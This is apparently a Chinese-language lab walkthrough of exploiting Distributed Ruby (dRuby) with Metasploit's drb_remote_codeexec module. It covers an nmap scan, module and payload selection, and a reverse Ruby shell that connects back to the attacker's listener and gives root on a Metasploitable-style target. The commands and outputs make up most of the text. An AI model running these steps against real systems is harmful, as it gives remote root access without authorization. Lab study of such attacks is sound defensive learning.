Metasploit对分布式Ruby进行远程代码执行

Metasploit对分布式Ruby进行远程代码执行

生活中,开发人员和用户每天都会有相似的操作习惯,这往往是黑客最容易利用对攻击目标与突破点。
我们在开发一款产品,每每都会在便利性和安全性之间进行权衡。
那么,在分布式Ruby的系统也会存在这样对现象,导致我们使用Metasploit就可以轻松地对其进行测试。

什么是分布式Ruby?

什么是分布式?单台计算机的计算能力不足、而又无法使用超级计算机的情况,
通过多台计算机的累加,把计算量和数据分布到每一台机器上,以达到超级计算机的效果。
分布式Ruby是Ruby编程语言的分布式对象系统,允许Ruby进程之间的远程方法调用。
虽然这项技术可以使用灵活的服务来增强某些程序,但如果没有正确实现,就会出现安全漏洞,

0x01 测试环境

这里演示,我们的攻击机和靶机都用的是ParrotSecurityOS,
IP:172.16.1.102
RubyVersion:ruby 2.0.0p648 (2015-12-16) [x86_64-linux]

0x02 验证漏洞

在我们的靶机上运行dRuby。在最初设置dRuby时,它会将自身绑定到特定的URI和端口,
我们今天演示端口为8787.以便我们可以正确被Nmap扫描。
使用nmap -sV ip -p 8787 来扫描目标主机和端口上运行的软件的版本并设置端口为8787

nmap -sV 172.16.1.102 -p 8787

[*] exec: nmap -sV 172.16.1.102 -p 8787

Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-25 18:16 CST
Nmap scan report for 172.16.1.102
Host is up (0.0013s latency).

PORT     STATE SERVICE VERSION
8787/tcp open  drb     Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
MAC Address: 08:00:27:77:62:6C (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.65 seconds

我们可以看到dRuby服务存在并正在运行,接下来掏出我们metasploit漏洞利用

0x03 漏洞利用

终端键入msfconsole启动Metasploit ,然后search drb以显示任何匹配的结果。如下:

msf > search drb

Matching Modules
================

   Name                                                   Disclosure Date  Rank       Check  Description
   ----                                                   ---------------  ----       -----  -----------
   exploit/linux/misc/drb_remote_codeexec                 2011-03-23       excellent  No     Distributed Ruby Remote Code Execution
   exploit/multi/misc/wireshark_lwres_getaddrbyname       2010-01-27       great      No     Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow
   exploit/multi/misc/wireshark_lwres_getaddrbyname_loop  2010-01-27       great      No     Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)

我们可以看到drb_remote_codeexec就是我们要找的,233。你可以使用use命令加载漏洞,然后在使用模块的路径。

msf > use exploit/linux/misc/drb_remote_codeexec
msf exploit(linux/misc/drb_remote_codeexec) > info

       Name: Distributed Ruby Remote Code Execution
     Module: exploit/linux/misc/drb_remote_codeexec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-03-23

Provided by:
  joernchen <joernchen@phenoelit.de>

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Trap
  2   Eval
  3   Syscall

Check supported:
  No

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   no        The target address
  RPORT  8787             yes       The target port
  URI                     no        The URI of the target host (druby://host:port) (overrides RHOST/RPORT)

Payload information:
  Space: 32768

Description:
  This module exploits remote code execution vulnerabilities in dRuby.

References:
  CVE: Not available
  http://www.ruby-doc.org/stdlib-1.9.3/libdoc/drb/rdoc/DRb.html
  http://blog.recurity-labs.com/archives/2011/05/12/druby_for_penetration_testers/
  http://bugkraut.de/posts/tainting

0x04启动漏洞利用
设置目标ip,端口

msf exploit(linux/misc/drb_remote_codeexec) > set rhost 172.16.1.102
rhost => 172.16.1.102
msf exploit(linux/misc/drb_remote_codeexec) > show payloads

Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Check  Description
   ----                                ---------------  ----    -----  -----------
   cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_busybox_telnetd                        normal  No     Unix Command Shell, Bind TCP (via BusyBox telnetd)
   cmd/unix/bind_lua                                    normal  No     Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal  No     Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal  No     Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal  No     Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_nodejs                                 normal  No     Unix Command Shell, Bind TCP (via nodejs)
   cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_r                                      normal  No     Unix Command Shell, Bind TCP (via R)
   cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_socat_udp                              normal  No     Unix Command Shell, Bind UDP (via socat)
   cmd/unix/bind_stub                                   normal  No     Unix Command Shell, Bind TCP (stub)
   cmd/unix/bind_zsh                                    normal  No     Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_bash                                normal  No     Unix Command Shell, Reverse TCP (/dev/tcp)
   cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   cmd/unix/reverse_ksh                                 normal  No     Unix Command Shell, Reverse TCP (via Ksh)
   cmd/unix/reverse_lua                                 normal  No     Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_ncat_ssl                            normal  No     Unix Command Shell, Reverse TCP (via ncat)
   cmd/unix/reverse_netcat                              normal  No     Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal  No     Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_nodejs                              normal  No     Unix Command Shell, Reverse TCP (via nodejs)
   cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal  No     Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_r                                   normal  No     Unix Command Shell, Reverse TCP (via R)
   cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_socat_udp                           normal  No     Unix Command Shell, Reverse UDP (via socat)
   cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_stub                                normal  No     Unix Command Shell, Reverse TCP (stub)
   cmd/unix/reverse_zsh                                 normal  No     Unix Command Shell, Reverse TCP (via Zsh)
   generic/custom                                       normal  No     Custom Payload
   generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline

我们选择cmd/unix/reverse_ruby

msf exploit(linux/misc/drb_remote_codeexec) > set payload cmd/unix/reverse_ruby
payload => cmd/unix/reverse_ruby
msf exploit(linux/misc/drb_remote_codeexec) > options

Module options (exploit/linux/misc/drb_remote_codeexec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  172.16.1.102     no        The target address
   RPORT  8787             yes       The target port
   URI                     no        The URI of the target host (druby://host:port) (overrides RHOST/RPORT)

Payload options (cmd/unix/reverse_ruby):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

设置监听地址

msf exploit(linux/misc/drb_remote_codeexec) > set lhost 172.16.1.100

lhost => 172.16.1.100

0x05 获取Shell
直接run

msf exploit(linux/misc/drb_remote_codeexec) > run

[*] Started reverse TCP handler on 172.16.1.100:4444
[*] Trying to exploit instance_eval method
[!] Target is not vulnerable to instance_eval method
[*] Trying to exploit syscall method
[*] attempting x86 execve of .JU4AK4Gh3sOBkaB7
[+] Deleted .JU4AK4Gh3sOBkaB7

whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
ip address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 08:00:27:77:62:6c brd ff:ff:ff:ff:ff:ff
    inet 172.16.1.102/12 brd 172.31.255.255 scope global eth0
    inet6 fe80::a00:27ff:fe77:626c/64 scope link
       valid_lft forever preferred_lft forever
3赞

服务器资源由ZeptoVM赞助

Partners Wiki IRC